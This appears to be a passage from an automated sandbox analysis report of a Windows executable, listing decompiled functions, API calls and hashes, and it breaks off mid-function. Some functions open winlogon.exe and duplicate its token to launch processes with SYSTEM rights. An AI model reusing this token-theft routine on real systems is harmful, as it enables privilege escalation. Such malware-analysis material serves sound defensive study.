                                                                                      • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                      				char _v8;
                                                                                      				void* _v12;
                                                                                      				void* __esi;
                                                                                      				void* _t18;
                                                                                      				intOrPtr* _t22;
                                                                                      				void* _t23;
                                                                                      				void* _t28;
                                                                                      				int _t37;
                                                                                      				intOrPtr* _t39;
                                                                                      				intOrPtr* _t40;
                                                                                      
                                                                                      				_v8 = 0;
                                                                                      				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                      				_v12 = _t18;
                                                                                      				if(_t18 == 0) {
                                                                                      					_t37 = GetLastError();
                                                                                      				} else {
                                                                                      					_t39 = _a4 + 0x800;
                                                                                      					_a8 = 0;
                                                                                      					E0040289F(_t39);
                                                                                      					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                      					if(_t22 == 0) {
                                                                                      						_t23 = 0;
                                                                                      					} else {
                                                                                      						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                      					}
                                                                                      					if(_t23 == 0) {
                                                                                      						_t37 = GetLastError();
                                                                                      					} else {
                                                                                      						_a4 = _a8;
                                                                                      						E0040289F(_t39);
                                                                                      						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                      						if(_t40 == 0) {
                                                                                      							_t28 = 0;
                                                                                      						} else {
                                                                                      							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                      						}
                                                                                      						if(_t28 == 0) {
                                                                                      							_t37 = GetLastError();
                                                                                      						} else {
                                                                                      							 *_a12 = _v8;
                                                                                      							_t37 = 0;
                                                                                      						}
                                                                                      						CloseHandle(_a8);
                                                                                      					}
                                                                                      					CloseHandle(_v12);
                                                                                      				}
                                                                                      				return _t37;
                                                                                      			}














                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                        • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                      • String ID: winlogon.exe
                                                                                      • API String ID: 1315556178-961692650
                                                                                      • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                      • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                      				int _v8;
                                                                                      				char _v12;
                                                                                      				void _v2058;
                                                                                      				void _v2060;
                                                                                      				int _t35;
                                                                                      				int _t41;
                                                                                      				signed int _t48;
                                                                                      				signed int _t49;
                                                                                      				signed short* _t50;
                                                                                      				void** _t52;
                                                                                      				void* _t53;
                                                                                      				void* _t54;
                                                                                      
                                                                                      				_t48 = 0;
                                                                                      				_v2060 = 0;
                                                                                      				memset( &_v2058, 0, 0x7fe);
                                                                                      				_t54 = _t53 + 0xc;
                                                                                      				 *__ebx = 0;
                                                                                      				_t52 = _a4 + 4;
                                                                                      				_v12 = 2;
                                                                                      				do {
                                                                                      					_push( *_t52);
                                                                                      					_t6 = _t52 - 4; // 0xe80040cb
                                                                                      					_push( *_t6);
                                                                                      					_push(L"%s (%s)");
                                                                                      					_push(0x400);
                                                                                      					_push( &_v2060);
                                                                                      					L0040B1EC();
                                                                                      					_t35 = wcslen( &_v2060);
                                                                                      					_v8 = _t35;
                                                                                      					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                      					_t49 = _t48 + _v8 + 1;
                                                                                      					_t41 = wcslen( *_t52);
                                                                                      					_v8 = _t41;
                                                                                      					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                      					_t54 = _t54 + 0x34;
                                                                                      					_t52 =  &(_t52[2]);
                                                                                      					_t23 =  &_v12;
                                                                                      					 *_t23 = _v12 - 1;
                                                                                      					_t48 = _t49 + _v8 + 1;
                                                                                      				} while ( *_t23 != 0);
                                                                                      				_t50 = __ebx + _t48 * 2;
                                                                                      				 *_t50 =  *_t50 & 0x00000000;
                                                                                      				_t50[1] = _t50[1] & 0x00000000;
                                                                                      				return __ebx;
                                                                                      			}
















                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                      • String ID: %s (%s)
                                                                                      • API String ID: 3979103747-1363028141
                                                                                      • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                      • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                      • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                      • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                      				void _v514;
                                                                                      				short _v516;
                                                                                      				void _v8710;
                                                                                      				short _v8712;
                                                                                      				int _t17;
                                                                                      				WCHAR* _t26;
                                                                                      
                                                                                      				E0040B550(0x2204, __ecx);
                                                                                      				_v8712 = 0;
                                                                                      				memset( &_v8710, 0, 0x2000);
                                                                                      				_t17 = GetDlgCtrlID(_a4);
                                                                                      				_t34 = _t17;
                                                                                      				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                      				if(_t17 > 0 && _v8712 != 0) {
                                                                                      					_v516 = 0;
                                                                                      					memset( &_v514, 0, 0x1fe);
                                                                                      					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                      					_t26 =  &_v516;
                                                                                      					_push(L"sysdatetimepick32");
                                                                                      					_push(_t26);
                                                                                      					L0040B278();
                                                                                      					if(_t26 != 0) {
                                                                                      						E00406025(_t34,  &_v8712);
                                                                                      					}
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                      • String ID: sysdatetimepick32
                                                                                      • API String ID: 1028950076-4169760276
                                                                                      • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                      • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                      • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                      • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E00404706(long __edi, wchar_t* _a4) {
                                                                                      				short _v8;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      				long _t14;
                                                                                      				long _t24;
                                                                                      
                                                                                      				_t24 = __edi;
                                                                                      				_t8 = 0;
                                                                                      				_t14 = 0x1100;
                                                                                      				if(__edi - 0x834 <= 0x383) {
                                                                                      					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                      					if(0 != 0) {
                                                                                      						_t14 = 0x1900;
                                                                                      					}
                                                                                      				}
                                                                                      				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                      					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                      				} else {
                                                                                      					if(wcslen(_v8) < 0x400) {
                                                                                      						wcscpy(_a4, _v8);
                                                                                      					}
                                                                                      					_t10 = LocalFree(_v8);
                                                                                      				}
                                                                                      				return _t10;
                                                                                      			}









                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                      • wcslen.MSVCRT ref: 00404756
                                                                                      • wcscpy.MSVCRT ref: 00404766
                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                      • wcscpy.MSVCRT ref: 00404780
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                      • String ID: netmsg.dll
                                                                                      • API String ID: 2767993716-3706735626
                                                                                      • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                      • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                      • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                      • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                      				intOrPtr _v12;
                                                                                      				void* _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				char _v32;
                                                                                      				char _v72;
                                                                                      				void _v582;
                                                                                      				long _v584;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t27;
                                                                                      				wchar_t* _t34;
                                                                                      				wchar_t* _t42;
                                                                                      				long* _t43;
                                                                                      				int _t44;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      				long _t56;
                                                                                      				long* _t57;
                                                                                      				void* _t60;
                                                                                      
                                                                                      				_t60 = __eflags;
                                                                                      				_t52 = __edx;
                                                                                      				E004095AB( &_v72);
                                                                                      				_v584 = 0;
                                                                                      				memset( &_v582, 0, 0x1fe);
                                                                                      				E004095FD(_t52, _t60,  &_v72);
                                                                                      				_t27 = 0;
                                                                                      				_v12 = 0;
                                                                                      				if(_v20 <= 0) {
                                                                                      					L10:
                                                                                      					_t56 = 0;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t57 = E00405A92(_t27,  &_v32);
                                                                                      						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                      							goto L9;
                                                                                      						} else {
                                                                                      							_t34 =  &_v584;
                                                                                      							_push(_t34);
                                                                                      							_push(_a4);
                                                                                      							L0040B278();
                                                                                      							if(_t34 == 0) {
                                                                                      								L5:
                                                                                      								_t44 = 0;
                                                                                      								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                      								if(_t54 == 0) {
                                                                                      									goto L9;
                                                                                      								} else {
                                                                                      									_v16 = _v16 & 0;
                                                                                      									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                      										_t44 = 1;
                                                                                      										CloseHandle(_v16);
                                                                                      									}
                                                                                      									CloseHandle(_t54);
                                                                                      									if(_t44 != 0) {
                                                                                      										_t56 =  *_t57;
                                                                                      									} else {
                                                                                      										goto L9;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t42 = wcschr( &_v584, 0x5c);
                                                                                      								if(_t42 == 0) {
                                                                                      									goto L9;
                                                                                      								} else {
                                                                                      									_t43 =  &(_t42[0]);
                                                                                      									_push(_t43);
                                                                                      									_push(_a4);
                                                                                      									L0040B278();
                                                                                      									if(_t43 != 0) {
                                                                                      										goto L9;
                                                                                      									} else {
                                                                                      										goto L5;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						goto L12;
                                                                                      						L9:
                                                                                      						_t27 = _v12 + 1;
                                                                                      						_v12 = _t27;
                                                                                      					} while (_t27 < _v20);
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				L12:
                                                                                      				E004095DA( &_v72);
                                                                                      				return _t56;
                                                                                      			}






















                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                        • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                        • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                        • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                        • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                        • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                        • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                        • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                        • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      • _wcsicmp.MSVCRT ref: 004059FA
                                                                                      • wcschr.MSVCRT ref: 00405A0E
                                                                                      • _wcsicmp.MSVCRT ref: 00405A20
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 768606695-0
                                                                                      • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                      • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				signed int _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				void _v68;
                                                                                      				char _v108;
                                                                                      				void _v160;
                                                                                      				void* __esi;
                                                                                      				signed int _t55;
                                                                                      				void* _t57;
                                                                                      				wchar_t* _t67;
                                                                                      				intOrPtr* _t73;
                                                                                      				signed int _t74;
                                                                                      				signed int _t86;
                                                                                      				signed int _t95;
                                                                                      				intOrPtr* _t98;
                                                                                      				void* _t100;
                                                                                      				void* _t102;
                                                                                      
                                                                                      				_t73 = __ebx;
                                                                                      				_t74 = 0xd;
                                                                                      				_push(9);
                                                                                      				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                      				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                      				_t102 = _t100 + 0x18;
                                                                                      				asm("movsw");
                                                                                      				E00407343(__ebx, _a4, L"<tr>");
                                                                                      				_t95 = 0;
                                                                                      				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                      						_v8 = _t55;
                                                                                      						_t57 =  &_v160;
                                                                                      						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                      							_t57 =  &_v68;
                                                                                      						}
                                                                                      						_t98 = _a8;
                                                                                      						_v28 = _v28 | 0xffffffff;
                                                                                      						_v24 = _v24 | 0xffffffff;
                                                                                      						_v20 = _v20 | 0xffffffff;
                                                                                      						_v16 = _v16 & 0x00000000;
                                                                                      						_v12 = _t57;
                                                                                      						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                      						E0040ADC0(_v28,  &_v108);
                                                                                      						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                      						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                      						_t67 =  *(_t73 + 0x64);
                                                                                      						_t86 =  *_t67 & 0x0000ffff;
                                                                                      						if(_t86 == 0 || _t86 == 0x20) {
                                                                                      							wcscat(_t67, L"&nbsp;");
                                                                                      						}
                                                                                      						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                      						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                      						_push( &_v108);
                                                                                      						_push(_v12);
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                      						L0040B1EC();
                                                                                      						_t102 = _t102 + 0x1c;
                                                                                      						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                      						_t95 = _t95 + 1;
                                                                                      					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t73, _a4, L"\r\n");
                                                                                      			}


                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscat
                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                      • API String ID: 384018552-4153097237
                                                                                      • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                      • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 42%
                                                                                      			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                      				struct tagMENUITEMINFOW _v0;
                                                                                      				int _t24;
                                                                                      				wchar_t* _t30;
                                                                                      				intOrPtr _t32;
                                                                                      				int _t34;
                                                                                      				int _t42;
                                                                                      				signed int _t47;
                                                                                      				signed int _t48;
                                                                                      
                                                                                      				_t36 = __ecx;
                                                                                      				_t48 = _t47 & 0xfffffff8;
                                                                                      				E0040B550(0x203c, __ecx);
                                                                                      				_t24 = GetMenuItemCount(_a8);
                                                                                      				_t34 = _t24;
                                                                                      				_t42 = 0;
                                                                                      				if(_t34 <= 0) {
                                                                                      					L13:
                                                                                      					return _t24;
                                                                                      				} else {
                                                                                      					goto L1;
                                                                                      				}
                                                                                      				do {
                                                                                      					L1:
                                                                                      					memset( &_a50, 0, 0x2000);
                                                                                      					_t48 = _t48 + 0xc;
                                                                                      					_a36 =  &_a48;
                                                                                      					_v0.cbSize = 0x30;
                                                                                      					_a4 = 0x36;
                                                                                      					_a40 = 0x1000;
                                                                                      					_a16 = 0;
                                                                                      					_a48 = 0;
                                                                                      					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                      					if(_t24 == 0) {
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					if(_a48 == 0) {
                                                                                      						L10:
                                                                                      						_t56 = _a20;
                                                                                      						if(_a20 != 0) {
                                                                                      							_push(0);
                                                                                      							_push(_a20);
                                                                                      							_push(_a4);
                                                                                      							_t24 = E0040605E(_t36, _t56);
                                                                                      							_t48 = _t48 + 0xc;
                                                                                      						}
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					_t30 = wcschr( &_a48, 9);
                                                                                      					if(_t30 != 0) {
                                                                                      						 *_t30 = 0;
                                                                                      					}
                                                                                      					_t31 = _a16;
                                                                                      					if(_a20 != 0) {
                                                                                      						if(_a12 == 0) {
                                                                                      							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                      							_t32 =  *0x40fe20; // 0x0
                                                                                      							_t31 = _t32 + 0x11558;
                                                                                      							__eflags = _t32 + 0x11558;
                                                                                      						} else {
                                                                                      							_t17 = _t42 + 0x11171; // 0x11171
                                                                                      							_t31 = _t17;
                                                                                      						}
                                                                                      					}
                                                                                      					_t24 = E00406025(_t31,  &_a48);
                                                                                      					_pop(_t36);
                                                                                      					goto L10;
                                                                                      					L12:
                                                                                      					_t42 = _t42 + 1;
                                                                                      				} while (_t42 < _t34);
                                                                                      				goto L13;
                                                                                      			}


                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 2029023288-3849865405
                                                                                      • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                      • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E00402BEE(void* __ebx) {
                                                                                      				int _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				int _v24;
                                                                                      				int _v28;
                                                                                      				void* _t27;
                                                                                      				int _t31;
                                                                                      				void* _t34;
                                                                                      				int _t37;
                                                                                      				int _t38;
                                                                                      				int _t41;
                                                                                      				int _t50;
                                                                                      
                                                                                      				_t34 = __ebx;
                                                                                      				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                      					return _t27;
                                                                                      				} else {
                                                                                      					asm("movsd");
                                                                                      					asm("movsd");
                                                                                      					asm("movsd");
                                                                                      					asm("movsd");
                                                                                      					_v8 = GetSystemMetrics(0x4e);
                                                                                      					_v12 = GetSystemMetrics(0x4f);
                                                                                      					_t41 = GetSystemMetrics(0x4c);
                                                                                      					_t31 = GetSystemMetrics(0x4d);
                                                                                      					if(_v8 == 0 || _v12 == 0) {
                                                                                      						_v8 = GetSystemMetrics(0);
                                                                                      						_v12 = GetSystemMetrics(1);
                                                                                      						_t41 = 0;
                                                                                      						_t31 = 0;
                                                                                      					} else {
                                                                                      						_v8 = _v8 + _t41;
                                                                                      						_v12 = _v12 + _t31;
                                                                                      					}
                                                                                      					_t50 = _v20 - _v28;
                                                                                      					if(_t50 > 0x14) {
                                                                                      						_t38 = _v24;
                                                                                      						_t37 = _v16 - _t38;
                                                                                      						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                      							_t31 = _t31 + 0xfffffff6;
                                                                                      							if(_t38 >= _t31) {
                                                                                      								_t31 = _v28;
                                                                                      								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
